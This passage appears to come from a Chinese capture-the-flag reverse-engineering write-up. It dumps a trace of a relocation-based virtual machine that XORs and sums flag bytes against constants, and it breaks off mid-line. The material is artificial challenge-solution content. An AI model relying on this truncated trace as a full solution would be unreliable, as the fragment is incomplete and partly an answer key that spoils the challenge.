- 689
- 690
- 691
- 692
- 693
- 694
- 695
- 696
- 697
- 698
- 699
- 700
- 701
- 702
- 703
- 704
- 705
- 706
- 707
- 708
- 709
- 710
- 711
- 712
- 713
- 714
- 715
- 716
- 717
- 718
- 719
- 720
- 721
- 722
- 723
- 724
- 725
- 726
- 727
- 728
- 729
- 730
- 731
- 732
- 733
- 734
- 735
- 736
- 737
- 738
- 739
- 740
- 741
- 742
- 743
3、导出
[0005] :: mov s2, &flag[0] [0007] :: mov(1) s4, s2 [0008] :: [ARRAY SLOT] [0009] :: mov arr[15], &1585408084625667200 [0010] :: mov arr[16], &195 [0011] :: mov s3, &arr[15] [0012] :: setinfo s3, name=0x1a, info=0x1, other=0x0, shndx=0x0 [0013] :: add arr[15], s3, 0 [0014] :: mov s2, &r101002.r_address [0016] :: mov(24) arr[15], s2 [0017] :: [ARRAY SLOT] [0018] :: mov arr[42], &141015791240320 [0019] :: mov arr[43], &195 [0020] :: mov s3, &arr[42] [0021] :: setinfo s3, name=0x1a, info=0x1, other=0x0, shndx=0x0 [0022] :: add arr[42], s3, 0 [0023] :: mov arr[42], s2 [0024] :: mov s2, &s4 [0026] :: mov(1) arr[0], s2 [0027] :: mov s2, &flag[1] [0028] :: mov s4, s2 [0029] :: [ARRAY SLOT] [0030] :: mov arr[78], &1657465678663595136 [0031] :: mov arr[79], &195 [0032] :: mov s3, &arr[78] [0033] :: setinfo s3, name=0x1a, info=0x1, other=0x0, shndx=0x0 [0034] :: add arr[78], s3, 0 [0035] :: mov s2, &r101002.r_address [0037] :: mov(24) arr[78], s2 [0038] :: [ARRAY SLOT] [0039] :: mov arr[105], &72198609829168256 [0040] :: mov arr[106], &195 [0041] :: mov s3, &arr[105] [0042] :: setinfo s3, name=0x1a, info=0x1, other=0x0, shndx=0x0 [0043] :: add arr[105], s3, 0 [0044] :: mov arr[105], s2 [0045] :: mov s2, &s4 [0047] :: mov(1) arr[0], s2 [0048] :: mov s2, &flag[2] [0049] :: mov s4, s2 [0050] :: [ARRAY SLOT] [0051] :: mov arr[141], &1153062520398099584 [0052] :: mov arr[142], &195 [0053] :: mov s3, &arr[141] [0054] :: setinfo s3, name=0x1a, info=0x1, other=0x0, shndx=0x0 [0055] :: add arr[141], s3, 0 [0056] :: mov s2, &r101002.r_address [0058] :: mov(24) arr[141], s2 [0059] :: [ARRAY SLOT] [0060] :: mov arr[168], &144256203867096192 [0061] :: mov arr[169], &195 [0062] :: mov s3, &arr[168] [0063] :: setinfo s3, name=0x1a, info=0x1, other=0x0, shndx=0x0 [0064] :: add arr[168], s3, 0 [0065] :: mov arr[168], s2 [0066] :: mov s2, &s4 [0068] :: mov(1) arr[0], s2 [0069] :: mov s2, &flag[3] [0070] :: mov s4, s2 [0071] :: [ARRAY SLOT] [0072] :: mov arr[204], &1297177708473955456 [0073] :: mov arr[205], &195 [0074] :: mov s3, &arr[204] [0075] :: setinfo s3, name=0x1a, info=0x1, other=0x0, shndx=0x0 [0076] :: add arr[204], s3, 0 [0077] :: mov s2, &r101002.r_address [0079] :: mov(24) arr[204], s2 [0080] :: [ARRAY SLOT] [0081] :: mov arr[231], &216313797905024128 [0082] :: mov arr[232], &195 [0083] :: mov s3, &arr[231] [0084] :: setinfo s3, name=0x1a, info=0x1, other=0x0, shndx=0x0 [0085] :: add arr[231], s3, 0 [0086] :: mov arr[231], s2 [0087] :: mov s2, &s4 [0089] :: mov(1) arr[0], s2 [0090] :: mov s2, &flag[4] [0091] :: mov s4, s2 [0092] :: exec r92.r_address <- 803425cc40800010c3000000000000000000000000000000 -------------------- 0x0: xor byte ptr [s4], 0x10 -------------------- [0101] :: array [0x4008040cc250480, 0xc3, 0x0] [0104] :: mov s3, &r101.r_address [0105] :: setinfo s3, name=0x1a, info=0x1, other=0x0, shndx=0x0 [0106] :: add r101.r_address, s3, 0 [0107] :: mov r101.r_address, s2 [0108] :: mov s2, &s4 [0110] :: mov(1) arr[0], s2 [0111] :: mov s2, &flag[5] [0112] :: mov s4, s2 [0113] :: exec r113.r_address <- 803425cc40800011c3000000000000000000000000000000 -------------------- 0x0: xor byte ptr [s4], 0x11 -------------------- [0122] :: array [0x5008040cc250480, 0xc3, 0x0] [0125] :: mov s3, &r122.r_address [0126] :: setinfo s3, name=0x1a, info=0x1, other=0x0, shndx=0x0 [0127] :: add r122.r_address, s3, 0 [0128] :: mov r122.r_address, s2 [0129] :: mov s2, &s4 [0131] :: mov(1) arr[0], s2 [0132] :: mov s2, &flag[6] [0133] :: mov s4, s2 [0134] :: exec r134.r_address <- 803425cc40800012c3000000000000000000000000000000 -------------------- 0x0: xor byte ptr [s4], 0x12 -------------------- [0143] :: array [0x6008040cc250480, 0xc3, 0x0] [0146] :: mov s3, &r143.r_address [0147] :: setinfo s3, name=0x1a, info=0x1, other=0x0, shndx=0x0 [0148] :: add r143.r_address, s3, 0 [0149] :: mov r143.r_address, s2 [0150] :: mov s2, &s4 [0152] :: mov(1) arr[0], s2 [0153] :: mov s2, &flag[7] [0154] :: mov s4, s2 [0155] :: exec r155.r_address <- 803425cc40800013c3000000000000000000000000000000 -------------------- 0x0: xor byte ptr [s4], 0x13 -------------------- [0164] :: array [0x7008040cc250480, 0xc3, 0x0] [0167] :: mov s3, &r164.r_address [0168] :: setinfo s3, name=0x1a, info=0x1, other=0x0, shndx=0x0 [0169] :: add r164.r_address, s3, 0 [0170] :: mov r164.r_address, s2 [0171] :: mov s2, &s4 [0173] :: mov(1) arr[0], s2 [0174] :: mov s2, &flag[8] [0175] :: mov s4, s2 [0176] :: exec r176.r_address <- 803425cc40800014c3000000000000000000000000000000 -------------------- 0x0: xor byte ptr [s4], 0x14 -------------------- [0185] :: array [0x8008040cc250480, 0xc3, 0x0] [0188] :: mov s3, &r185.r_address [0189] :: setinfo s3, name=0x1a, info=0x1, other=0x0, shndx=0x0 [0190] :: add r185.r_address, s3, 0 [0191] :: mov r185.r_address, s2 [0192] :: mov s2, &s4 [0194] :: mov(1) arr[1], s2 [0195] :: mov s2, &flag[9] [0196] :: mov s4, s2 [0197] :: exec r197.r_address <- 803425cc40800015c3000000000000000000000000000000 -------------------- 0x0: xor byte ptr [s4], 0x15 -------------------- [0206] :: array [0x9008040cc250480, 0xc3, 0x0] [0209] :: mov s3, &r206.r_address [0210] :: setinfo s3, name=0x1a, info=0x1, other=0x0, shndx=0x0 [0211] :: add r206.r_address, s3, 0 [0212] :: mov r206.r_address, s2 [0213] :: mov s2, &s4 [0215] :: mov(1) arr[1], s2 [0216] :: mov s2, &flag[10] [0217] :: mov s4, s2 [0218] :: exec r218.r_address <- 803425cc40800016c3000000000000000000000000000000 -------------------- 0x0: xor byte ptr [s4], 0x16 -------------------- [0227] :: array [0xa008040cc250480, 0xc3, 0x0] [0230] :: mov s3, &r227.r_address [0231] :: setinfo s3, name=0x1a, info=0x1, other=0x0, shndx=0x0 [0232] :: add r227.r_address, s3, 0 [0233] :: mov r227.r_address, s2 [0234] :: mov s2, &s4 [0236] :: mov(1) arr[1], s2 [0237] :: mov s2, &flag[11] [0238] :: mov s4, s2 [0239] :: exec r239.r_address <- 803425cc40800017c3000000000000000000000000000000 -------------------- 0x0: xor byte ptr [s4], 0x17 -------------------- [0248] :: array [0xb008040cc250480, 0xc3, 0x0] [0251] :: mov s3, &r248.r_address [0252] :: setinfo s3, name=0x1a, info=0x1, other=0x0, shndx=0x0 [0253] :: add r248.r_address, s3, 0 [0254] :: mov r248.r_address, s2 [0255] :: mov s2, &s4 [0257] :: mov(1) arr[1], s2 [0258] :: mov s2, &flag[12] [0259] :: mov s4, s2 [0260] :: exec r260.r_address <- 803425cc40800018c3000000000000000000000000000000 -------------------- 0x0: xor byte ptr [s4], 0x18 -------------------- [0269] :: array [0xc008040cc250480, 0xc3, 0x0] [0272] :: mov s3, &r269.r_address [0273] :: setinfo s3, name=0x1a, info=0x1, other=0x0, shndx=0x0 [0274] :: add r269.r_address, s3, 0 [0275] :: mov r269.r_address, s2 [0276] :: mov s2, &s4 [0278] :: mov(1) arr[1], s2 [0279] :: mov s2, &flag[13] [0280] :: mov s4, s2 [0281] :: exec r281.r_address <- 803425cc40800019c3000000000000000000000000000000 -------------------- 0x0: xor byte ptr [s4], 0x19 -------------------- [0290] :: array [0xd008040cc250480, 0xc3, 0x0] [0293] :: mov s3, &r290.r_address [0294] :: setinfo s3, name=0x1a, info=0x1, other=0x0, shndx=0x0 [0295] :: add r290.r_address, s3, 0 [0296] :: mov r290.r_address, s2 [0297] :: mov s2, &s4 [0299] :: mov(1) arr[1], s2 [0300] :: mov s2, &flag[14] [0301] :: mov s4, s2 [0302] :: exec r302.r_address <- 803425cc40800024c3000000000000000000000000000000 -------------------- 0x0: xor byte ptr [s4], 0x24 -------------------- [0311] :: array [0xe008040cc250480, 0xc3, 0x0] [0314] :: mov s3, &r311.r_address [0315] :: setinfo s3, name=0x1a, info=0x1, other=0x0, shndx=0x0 [0316] :: add r311.r_address, s3, 0 [0317] :: mov r311.r_address, s2 [0318] :: mov s2, &s4 [0320] :: mov(1) arr[1], s2 [0321] :: mov s2, &flag[15] [0322] :: mov s4, s2 [0323] :: exec r323.r_address <- 803425cc4080002cc3000000000000000000000000000000 -------------------- 0x0: xor byte ptr [s4], 0x2c -------------------- [0332] :: array [0xf008040cc250480, 0xc3, 0x0] [0335] :: mov s3, &r332.r_address [0336] :: setinfo s3, name=0x1a, info=0x1, other=0x0, shndx=0x0 [0337] :: add r332.r_address, s3, 0 [0338] :: mov r332.r_address, s2 [0339] :: mov s2, &s4 [0341] :: mov(1) arr[1], s2 [0342] :: mov s2, &flag[16] [0343] :: mov s4, s2 [0344] :: exec r344.r_address <- 803425cc40800026c3000000000000000000000000000000 -------------------- 0x0: xor byte ptr [s4], 0x26 -------------------- [0353] :: array [0x10008040cc250480, 0xc3, 0x0] [0356] :: mov s3, &r353.r_address [0357] :: setinfo s3, name=0x1a, info=0x1, other=0x0, shndx=0x0 [0358] :: add r353.r_address, s3, 0 [0359] :: mov r353.r_address, s2 [0360] :: mov s2, &s4 [0362] :: mov(1) arr[2], s2 [0363] :: mov s2, &flag[17] [0364] :: mov s4, s2 [0365] :: exec r365.r_address <- 803425cc4080001ec3000000000000000000000000000000 -------------------- 0x0: xor byte ptr [s4], 0x1e -------------------- [0374] :: array [0x11008040cc250480, 0xc3, 0x0] [0377] :: mov s3, &r374.r_address [0378] :: setinfo s3, name=0x1a, info=0x1, other=0x0, shndx=0x0 [0379] :: add r374.r_address, s3, 0 [0380] :: mov r374.r_address, s2 [0381] :: mov s2, &s4 [0383] :: mov(1) arr[2], s2 [0384] :: mov s2, &flag[18] [0385] :: mov s4, s2 [0386] :: exec r386.r_address <- 803425cc4080001fc3000000000000000000000000000000 -------------------- 0x0: xor byte ptr [s4], 0x1f -------------------- [0395] :: array [0x12008040cc250480, 0xc3, 0x0] [0398] :: mov s3, &r395.r_address [0399] :: setinfo s3, name=0x1a, info=0x1, other=0x0, shndx=0x0 [0400] :: add r395.r_address, s3, 0 [0401] :: mov r395.r_address, s2 [0402] :: mov s2, &s4 [0404] :: mov(1) arr[2], s2 [0405] :: mov s2, &flag[19] [0406] :: mov s4, s2 [0407] :: exec r407.r_address <- 803425cc40800020c3000000000000000000000000000000 -------------------- 0x0: xor byte ptr [s4], 0x20 -------------------- [0416] :: array [0x13008040cc250480, 0xc3, 0x0] [0419] :: mov s3, &r416.r_address [0420] :: setinfo s3, name=0x1a, info=0x1, other=0x0, shndx=0x0 [0421] :: add r416.r_address, s3, 0 [0422] :: mov r416.r_address, s2 [0423] :: mov s2, &s4 [0425] :: mov(1) arr[2], s2 [0426] :: mov s2, &flag[20] [0427] :: mov s4, s2 [0428] :: exec r428.r_address <- 803425cc40800020c3000000000000000000000000000000 -------------------- 0x0: xor byte ptr [s4], 0x20 -------------------- [0437] :: array [0x14008040cc250480, 0xc3, 0x0] [0440] :: mov s3, &r437.r_address [0441] :: setinfo s3, name=0x1a, info=0x1, other=0x0, shndx=0x0 [0442] :: add r437.r_address, s3, 0 [0443] :: mov r437.r_address, s2 [0444] :: mov s2, &s4 [0446] :: mov(1) arr[2], s2 [0447] :: mov s2, &flag[21] [0448] :: mov s4, s2 [0449] :: exec r449.r_address <- 803425cc40800021c3000000000000000000000000000000 -------------------- 0x0: xor byte ptr [s4], 0x21 -------------------- [0458] :: array [0x15008040cc250480, 0xc3, 0x0] [0461] :: mov s3, &r458.r_address [0462] :: setinfo s3, name=0x1a, info=0x1, other=0x0, shndx=0x0 [0463] :: add r458.r_address, s3, 0 [0464] :: mov r458.r_address, s2 [0465] :: mov s2, &s4 [0467] :: mov(1) arr[2], s2 [0468] :: mov s2, &flag[22] [0469] :: mov s4, s2 [0470] :: exec r470.r_address <- 803425cc40800023c3000000000000000000000000000000 -------------------- 0x0: xor byte ptr [s4], 0x23 -------------------- [0479] :: array [0x16008040cc250480, 0xc3, 0x0] [0482] :: mov s3, &r479.r_address [0483] :: setinfo s3, name=0x1a, info=0x1, other=0x0, shndx=0x0 [0484] :: add r479.r_address, s3, 0 [0485] :: mov r479.r_address, s2 [0486] :: mov s2, &s4 [0488] :: mov(1) arr[2], s2 [0489] :: mov s2, &flag[23] [0490] :: mov s4, s2 [0491] :: exec r491.r_address <- 803425cc40800027c3000000000000000000000000000000 -------------------- 0x0: xor byte ptr [s4], 0x27 -------------------- [0500] :: array [0x17008040cc250480, 0xc3, 0x0] [0503] :: mov s3, &r500.r_address [0504] :: setinfo s3, name=0x1a, info=0x1, other=0x0, shndx=0x0 [0505] :: add r500.r_address, s3, 0 [0506] :: mov r500.r_address, s2 [0507] :: mov s2, &s4 [0509] :: mov(1) arr[2], s2 [0510] :: mov s2, &flag[24] [0511] :: mov s4, s2 [0512] :: exec r512.r_address <- 803425cc40800024c3000000000000000000000000000000 -------------------- 0x0: xor byte ptr [s4], 0x24 -------------------- [0521] :: array [0x18008040cc250480, 0xc3, 0x0] [0524] :: mov s3, &r521.r_address [0525] :: setinfo s3, name=0x1a, info=0x1, other=0x0, shndx=0x0 [0526] :: add r521.r_address, s3, 0 [0527] :: mov r521.r_address, s2 [0528] :: mov s2, &s4 [0530] :: mov(1) arr[3], s2 [0531] :: mov s2, &flag[25] [0532] :: mov s4, s2 [0533] :: exec r533.r_address <- 803425cc40800025c3000000000000000000000000000000 -------------------- 0x0: xor byte ptr [s4], 0x25 -------------------- [0542] :: array [0x19008040cc250480, 0xc3, 0x0] [0545] :: mov s3, &r542.r_address [0546] :: setinfo s3, name=0x1a, info=0x1, other=0x0, shndx=0x0 [0547] :: add r542.r_address, s3, 0 [0548] :: mov r542.r_address, s2 [0549] :: mov s2, &s4 [0551] :: mov(1) arr[3], s2 [0552] :: mov s2, &flag[26] [0553] :: mov s4, s2 [0554] :: exec r554.r_address <- 803425cc40800026c3000000000000000000000000000000 -------------------- 0x0: xor byte ptr [s4], 0x26 -------------------- [0563] :: array [0x1a008040cc250480, 0xc3, 0x0] [0566] :: mov s3, &r563.r_address [0567] :: setinfo s3, name=0x1a, info=0x1, other=0x0, shndx=0x0 [0568] :: add r563.r_address, s3, 0 [0569] :: mov r563.r_address, s2 [0570] :: mov s2, &s4 [0572] :: mov(1) arr[3], s2 [0573] :: mov s2, &flag[27] [0574] :: mov s4, s2 [0575] :: exec r575.r_address <- 803425cc40800027c3000000000000000000000000000000 -------------------- 0x0: xor byte ptr [s4], 0x27 -------------------- [0584] :: array [0x1b008040cc250480, 0xc3, 0x0] [0587] :: mov s3, &r584.r_address [0588] :: setinfo s3, name=0x1a, info=0x1, other=0x0, shndx=0x0 [0589] :: add r584.r_address, s3, 0 [0590] :: mov r584.r_address, s2 [0591] :: mov s2, &s4 [0593] :: mov(1) arr[3], s2 [0594] :: mov s4, &0 [0595] :: mov 4210788, &0 [0596] :: mov s5, &0 [0597] :: mov s2, &arr[0] [0599] :: mov s6, s2 [0600] :: exec r600.r_address <- 803425fc40800070c3000000000000000000000000000000 -------------------- 0x0: xor byte ptr [s6], 0x70 -------------------- [0609] :: mov s2, &s6 [0611] :: add s5, s5, s2 [0614] :: mov s6, &0 [0615] :: mov s2, &arr[0] [0616] :: mov s6, s2 [0617] :: exec r617.r_address <- 803425fc4080007cc3000000000000000000000000000000 -------------------- 0x0: xor byte ptr [s6], 0x7c -------------------- [0626] :: mov s2, &s6 [0628] :: add s5, s5, s2 [0631] :: mov s6, &0 [0632] :: mov s2, &arr[0] [0633] :: mov s6, s2 [0634] :: exec r634.r_address <- 803425fc40800073c3000000000000000000000000000000 -------------------- 0x0: xor byte ptr [s6], 0x73 -------------------- [0643] :: mov s2, &s6 [0645] :: add s5, s5, s2 [0648] :: mov s6, &0 [0649] :: mov s2, &arr[0] [0650] :: mov s6, s2 [0651] :: exec r651.r_address <- 803425fc40800078c3000000000000000000000000000000 -------------------- 0x0: xor byte ptr [s6], 0x78 -------------------- [0660] :: mov s2, &s6 [0662] :: add s5, s5, s2 [0665] :: mov s6, &0 [0666] :: mov s2, &arr[0] [0667] :: mov s6, s2 [0668] :: exec r668.r_address <- 803425fc4080006fc3000000000000000000000000000000 -------------------- 0x0: xor byte ptr [s6], 0x6f -------------------- [0677] :: mov s2, &s6 [0679] :: add s5, s5, s2 [0682] :: mov s6, &0 [0683] :: mov s2, &arr[0] [0684] :: mov s6, s2 [0685] :: exec r685.r_address <- 803425fc40800027c3000000000000000000000000000000 -------------------- 0x0: xor byte ptr [s6], 0x27 -------------------- [0694] :: mov s2, &s6 [0696] :: add s5, s5, s2 [0699] :: mov s6, &0 [0700] :: mov s2, &arr[0] [0701] :: mov s6, s2 [0702] :: exec r702.r_address <- 803425fc4080002ac3000000000000000000000000000000 -------------------- 0x0: xor byte ptr [s6], 0x2a -------------------- [0711] :: mov s2, &s6 [0713] :: add s5, s5, s2 [0716] :: mov s6, &0 [0717] :: mov s2, &arr[0] [0718] :: mov s6, s2 [0719] :: exec r719.r_address <- 803425fc4080002cc3000000000000000000000000000000 -------------------- 0x0: xor byte ptr [s6], 0x2c -------------------- [0728] :: mov s2, &s6 [0730] :: add s5, s5, s2 [0733] :: mov s6, &0 [0734] :: mov s2, &arr[1] [0735] :: mov s6, s2 [0736] :: exec r736.r_address <- 803425fc4080007fc3000000000000000000000000000000 -------------------- 0x0: xor byte ptr [s6], 0x7f -------------------- [0745] :: mov s2, &s6 [0747] :: add s5, s5, s2 [0750] :: mov s6, &0 [0751] :: mov s2, &arr[1] [0752] :: mov s6, s2 [0753] :: exec r753.r_address <- 803425fc40800035c3000000000000000000000000000000 -------------------- 0x0: xor byte ptr [s6], 0x35 -------------------- [0762] :: mov s2, &s6 [0764] :: add s5, s5, s2 [0767] :: mov s6, &0 [0768] :: mov s2, &arr[1] [0769] :: mov s6, s2 [0770] :: exec r770.r_address <- 803425fc4080002dc3000000000000000000000000000000 -------------------- 0x0: xor byte ptr [s6], 0x2d -------------------- [0779] :: mov s2, &s6 [0781] :: add s5, s5, s2 [0784] :: mov s6, &0 [0785] :: mov s2, &arr[1] [0786] :: mov s6, s2 [0787] :: exec r787.r_address <- 803425fc40800032c3000000000000000000000000000000 -------------------- 0x0: xor byte ptr [s6], 0x32 -------------------- [0796] :: mov s2, &s6 [0798] :: add s5, s5, s2 [0801] :: mov s6, &0 [0802] :: mov s2, &arr[1] [0803] :: mov s6, s2 [0804] :: exec r804.r_address <- 803425fc40800037c3000000000000000000000000000000 -------------------- 0x0: xor byte ptr [s6], 0x37 -------------------- [0813] :: mov s2, &s6 [0815] :: add s5, s5, s2 [0818] :: mov s6, &0 [0819] :: mov s2, &arr[1] [0820] :: mov s6, s2 [0821] :: exec r821.r_address <- 803425fc4080003bc3000000000000000000000000000000 -------------------- 0x0: xor byte ptr [s6], 0x3b -------------------- [0830] :: mov s2, &s6 [0832] :: add s5, s5, s2 [0835] :: mov s6, &0 [0836] :: mov s2, &arr[1] [0837] :: mov s6, s2 [0838] :: exec r838.r_address <- 803425fc40800022c3000000000000000000000000000000 -------------------- 0x0: xor byte ptr [s6], 0x22 -------------------- [0847] :: mov s2, &s6 [0849] :: add s5, s5, s2 [0852] :: mov s6, &0 [0853] :: mov s2, &arr[1] [0854] :: mov s6, s2 [0855] :: exec r855.r_address <- 803425fc40800059c3000000000000000000000000000000 -------------------- 0x0: xor byte ptr [s6], 0x59 -------------------- [0864] :: mov s2, &s6 [0866] :: add s5, s5, s2 [0869] :: mov s6, &0 [0870] :: mov s2, &arr[2] [0871] :: mov s6, s2 [0872] :: exec r872.r_address <- 803425fc40800053c3000000000000000000000000000000 -------------------- 0x0: xor byte ptr [s6], 0x53 -------------------- [0881] :: mov s2, &s6 [0883] :: add s5, s5, s2 [0886] :: mov s6, &0 [0887] :: mov s2, &arr[2] [0888] :: mov s6, s2 [0889] :: exec r889.r_address <- 803425fc4080008ec3000000000000000000000000000000 -------------------- 0x0: xor byte ptr [s6], 0x8e -------------------- [0898] :: mov s2, &s6 [0900] :: add s5, s5, s2 [0903] :: mov s6, &0 [0904] :: mov s2, &arr[2] [0905] :: mov s6, s2 [0906] :: exec r906.r_address <- 803425fc4080003dc3000000000000000000000000000000 -------------------- 0x0: xor byte ptr [s6], 0x3d -------------------- [0915] :: mov s2, &s6 [0917] :: add s5, s5, s2 [0920] :: mov s6, &0 [0921] :: mov s2, &arr[2] [0922] :: mov s6, s2 [0923] :: exec r923.r_address <- 803425fc4080002ac3000000000000000000000000000000 -------------------- 0x0: xor byte ptr [s6], 0x2a -------------------- [0932] :: mov s2, &s6 [0934] :: add s5, s5, s2 [0937] :: mov s6, &0 [0938] :: mov s2, &arr[2] [0939] :: mov s6, s2 [0940] :: exec r940.r_address <- 803425fc40800059c3000000000000000000000000000000 -------------------- 0x0: xor byte ptr [s6], 0x59 -------------------- [0949] :: mov s2, &s6 [0951] :: add s5, s5, s2 [0954] :: mov s6, &0 [0955] :: mov s2, &arr[2] [0956] :: mov s6, s2 [0957] :: exec r957.r_address <- 803425fc40800027c3000000000000000000000000000000 -------------------- 0x0: xor byte ptr [s6], 0x27 -------------------- [0966] :: mov s2, &s6 [0968] :: add s5, s5, s2 [0971] :: mov s6, &0 [0972] :: mov s2, &arr[2] [0973] :: mov s6, s2 [0974] :: exec r974.r_address <- 803425fc4080002dc3000000000000000000000000000000 -------------------- 0x0: xor byte ptr [s6], 0x2d -------------------- [0983] :: mov s2, &s6 [0985] :: add s5, s5, s2 [0988] :: mov s6, &0 [0989] :: mov s2, &arr[2] [0990] :: mov s6, s2 [0991] :: exec r991.r_address <- 803425fc40800029c3000000000000000000000000000000 -------------------- 0x0: xor byte ptr [s6], 0x29 -------------------- [1000] :: mov s2, &s6 [1002] :: add s5, s5, s2 [1005] :: mov s6, &0 [1006] :: mov s2, &arr[3] [1007] :: mov s6, s2 [1008] :: exec r1008.r_address <- 803425fc40800034c3000000000000000000000000000000 -------------------- 0x0: xor byte ptr [s6], 0x34 -------------------- [1017] :: mov s2, &s6 [1019] :: add s5, s5, s2 [1022] :: mov s6, &0 [1023] :: mov s2, &arr[3] [1024] :: mov s6, s2 [1025] :: exec r1025.r_address <- 803425fc4080002dc3000000000000000000000000000000 -------------------- 0x0: xor byte ptr [s6], 0x2d -------------------- [1034] :: mov s2, &s6 [1036] :: add s5, s5, s2 [1039] :: mov s6, &0 [1040] :: mov s2, &arr[3] [1041] :: mov s6, s2 [1042] :: exec r1042.r_address <- 803425fc40800061c3000000000000000000000000000000 -------------------- 0x0: xor byte ptr [s6], 0x61 -------------------- [1051] :: mov s2, &s6 [1053] :: add s5, s5, s2 [1056] :: mov s6, &0 [1057] :: mov s2, &arr[3] [1058] :: mov s6, s2 [1059] :: exec r1059.r_address <- 803425fc40800032c3000000000000000000000000000000 -------------------- 0x0: xor byte ptr [s6], 0x32 -------------------- [1068] :: mov s2, &s6 [1070] :: add s5, s5, s2 [1073] :: mov s6, &0 [1074] :: mov s2, &flag[28] [1075] :: mov s6, s2 [1076] :: mov s2, &flag[29] [1077] :: mov s7, s2 [1078] :: mov s8, &0 [1079] :: mov s2, &s8 [1080] :: add s8, s8, s2 [1083] :: mov s2, &s6 [1084] :: add s8, s8, s2 [1087] :: mov s9, &0 [1088] :: mov s2, &s9 [1089] :: add s9, s9, s2 [1092] :: mov s2, &s7 [1093] :: add s9, s9, s2 [1096] :: mov s2, &s9 [1097] :: add s10, s8, s2 [1100] :: exec r1100.r_address <- 8034255c4180006cc3000000000000000000000000000000 -------------------- 0x0: xor byte ptr [s10], 0x6c -------------------- [1109] :: mov s2, &s10 [1111] :: add s5, s5, s2 [1114] :: mov s6, &0 [1115] :: mov s7, &0 [1116] :: mov s8, &0 [1117] :: mov s9, &0 [1118] :: mov s10, &0 [1119] :: mov s2, &flag[28] [1120] :: mov s6, s2 [1121] :: mov s2, &flag[29] [1122] :: mov s7, s2 [1123] :: mov s8, &0 [1124] :: mov s2, &s8 [1125] :: add s8, s8, s2 [1128] :: mov s2, &s6 [1129] :: add s8, s8, s2 [1132] :: mov s2, &s8 [1133] :: add s8, s8, s2 [1136] :: mov s9, &0 [1137] :: mov s2, &s9 [1138] :: add s9, s9, s2 [1141] :: mov s2, &s7 [1142] :: add s9, s9, s2 [1145] :: mov s2, &s9 [1146] :: add s10, s8, s2 [1149] :: exec r1149.r_address <- 8034255c418000a1c3000000000000000000000000000000 -------------------- 0x0: xor byte ptr [s10], 0xa1 -------------------- [1158] :: mov s2, &s10 [1160] :: add s5, s5, s2 [1163] :: mov s6, &0 [1164] :: mov s7, &0 [1165] :: mov s8, &0 [1166] :: mov s9, &0 [1167] :: mov s10, &0 [1168] :: mov s2, &flag[30] [1169] :: mov s6, s2 [1170] :: mov s2, &flag[31] [1171] :: mov s7, s2 [1172] :: mov s8, &0 [1173] :: mov s2, &s8 [1174] :: add s8, s8, s2 [1177] :: mov s2, &s6 ; s2 = flag[30] [1178] :: add s8, s8, s2 ; s8 = flag[30] [1181] :: mov s9, &0 [1182] :: mov s2, &s9 [1183] :: add s9, s9, s2 [1186] :: mov s2, &s7 ; s2 = flag[31] [1187] :: add s9, s9, s2 ; s9 = flag[31] [1190] :: mov s2, &s9 [1191] :: add s10, s8, s2 ; s10 = flag[30] + flag[31] [1194] :: exec r1194.r_address <- 8034255c418000b1c3000000000000000000000000000000 -------------------- 0x0: xor byte ptr [s10], 0xb1 -------------------- [1203] :: mov s2, &s10 [1205] :: add s5, s5, s2 [1208] :: mov s6, &0 [1209] :: mov s7, &0 [1210] :: mov s8, &0 [1211] :: mov s9, &0 [1212] :: mov s10, &0 [1213] :: mov s2, &flag[30] [1214] :: mov s6, s2 ; s6 = flag[30] [1215] :: mov s2, &flag[31] [1216] :: mov s7, s2 ; s7 = flag[31] [1217] :: mov s8, &0 [1218] :: mov s2, &s8 [1219] :: add s8, s8, s2 [1222] :: mov s2, &s6 [1223] :: add s8, s8, s2 [1226] :: mov s2, &s8 [1227] :: add s8, s8, s2 ; s8 = flag[30] + flag[30] [1230] :: mov s9, &0 [1231] :: mov s2, &s9 [1232] :: add s9, s9, s2 [1235] :: mov s2, &s7 [1236] :: add s9, s9, s2 [1239] :: mov s2, &s9 [1240] :: add s10, s8, s2 ; s10 = flag[30] + flag[30] + flag[31] [1243] :: exec r1243.r_address <- 8034255c418000e5c3000000000000000000000000000000 -------------------- 0x0: xor byte ptr [s10], 0xe5 -------------------- [1252] :: mov s2, &s10 [1254] :: add s5, s5, s2 [1257] :: mov s6, &0 [1258] :: mov s7, &0 [1259] :: mov s8, &0 [1260] :: mov s9, &0 [1261] :: mov s10, &0 [1262] :: mov s2, &s5 [1264] :: mov(1) 4210788, s2 [1265] :: [ARRAY SLOT] [1266] :: [ARRAY SLOT] [1267] :: [ARRAY SLOT] [1268] :: [ARRAY SLOT] [1269] :: [ARRAY SLOT] [1270] :: [ARRAY SLOT] [1271] :: [ARRAY SLOT] [1272] :: [ARRAY SLOT] [1273] :: [ARRAY SLOT] [1274] :: [ARRAY SLOT] [1275] :: [ARRAY SLOT] [1276] :: [ARRAY SLOT] [1277] :: [ARRAY SLOT] [1278] :: [ARRAY SLOT] [1279] :: [ARRAY SLOT] [1280] :: [ARRAY SLOT] [1281] :: [ARRAY SLOT] [1282] :: [ARRAY SLOT] [1283] :: [ARRAY SLOT] [1284] :: [ARRAY SLOT] [1285] :: [ARRAY SLOT] [1286] :: [ARRAY SLOT] [1287] :: [ARRAY SLOT] [1288] :: [ARRAY SLOT] [1289] :: [ARRAY SLOT] [1290] :: [ARRAY SLOT] [1291] :: [ARRAY SLOT] [1292] :: [ARRAY SLOT] [1293] :: [ARRAY SLOT] [1294] :: [ARRAY SLOT] [1295] :: [ARRAY SLOT] [1296] :: [ARRAY SLOT] [1297] :: [ARRAY SLOT] [1298] :: [ARRAY SLOT] [1299] :: [ARRAY SLOT] [1300] :: [ARRAY SLOT] [1301] :: [ARRAY SLOT] [1302] :: [ARRAY SLOT] [1303] :: [ARRAY SLOT] [1304] :: [ARRAY SLOT] [1305] :: [ARRAY SLOT] [1306] :: [ARRAY SLOT] [1307] :: [ARRAY SLOT] [1308] :: [ARRAY SLOT] [1309] :: [ARRAY SLOT] [1310] :: [ARRAY SLOT] [1311] :: [ARRAY SLOT] [1312] :: [ARRAY SLOT] [1313] :: [ARRAY SLOT] [1314] :: [ARRAY SLOT] [1315] :: [ARRAY SLOT] [1316] :: [ARRAY SLOT] [1317] :: [ARRAY SLOT] [1318] :: [ARRAY SLOT] [1319] :: [ARRAY SLOT] [1320] :: [ARRAY SLOT] [1321] :: [ARRAY SLOT] [1322] :: [ARRAY SLOT] [1323] :: [ARRAY SLOT] [1324] :: [ARRAY SLOT] [1325] :: [ARRAY SLOT] [1326] :: [ARRAY SLOT] [1327] :: [ARRAY SLOT] [1328] :: [ARRAY 